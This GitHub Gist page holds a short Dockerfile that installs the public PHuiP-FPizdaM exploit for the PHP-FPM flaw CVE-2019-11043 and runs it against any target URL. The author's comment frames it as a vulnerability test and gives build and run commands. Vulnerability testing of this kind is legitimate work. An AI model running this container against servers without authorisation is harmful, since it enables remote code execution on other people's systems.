Skip to content

Instantly share code, notes, and snippets.

@renan-taranto
Last active October 30, 2019 02:37
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save renan-taranto/5990c7a648377ec6286959ed0bedde8e to your computer and use it in GitHub Desktop.
Save renan-taranto/5990c7a648377ec6286959ed0bedde8e to your computer and use it in GitHub Desktop.
PHuiP-FPizdaM Dockerfile
FROM golang:1.13
WORKDIR /go/src/app
RUN go get -v github.com/neex/phuip-fpizdam
CMD ["sh", "-c", "phuip-fpizdam ${URL}"]
@renan-taranto
Copy link
Author

renan-taranto commented Oct 30, 2019

Dockerfile to test for the CVE-2019-11043 issue using PHuiP-FPizdaM exploit.

Usage:
1- Build the image with docker build -t phpuip-fpizdam .
2- Run with docker run -e URL={URL} -t phpuip-fpizdam, setting the URL environment variable to the target url

See the official exploit repository for more information https://github.com/neex/phuip-fpizdam

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment